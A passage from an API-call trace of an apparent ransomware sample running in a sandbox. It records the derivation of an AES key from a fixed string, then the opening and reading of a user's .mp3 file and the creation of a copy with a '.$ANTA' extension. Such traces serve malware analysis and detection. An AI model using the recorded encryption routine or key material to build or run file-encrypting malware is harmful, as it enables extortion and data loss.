lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.801] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca2b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0110.802] CryptHashData (hHash=0x41ac440, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0110.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.802] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca1d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0110.802] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0110.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0110.802] CryptDestroyHash (hHash=0x41ac440) returned 1 [0110.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0110.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9bf0 [0110.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0110.803] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0110.803] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0110.803] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\mztsenpjhovp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0110.804] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.804] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.805] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0110.805] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0110.805] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0110.807] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.807] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\mztsenpjhovp.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0110.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0110.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.947] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0110.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0110.950] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0110.950] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0110.953] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0xc18, lpOverlapped=0x0) returned 1 [0110.953] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10c18) returned 0x4516010 [0110.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0110.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10c18) returned 0x4526c30 [0110.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.958] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10c18) returned 0x4516010 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.959] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.959] RtlAllocateHeap 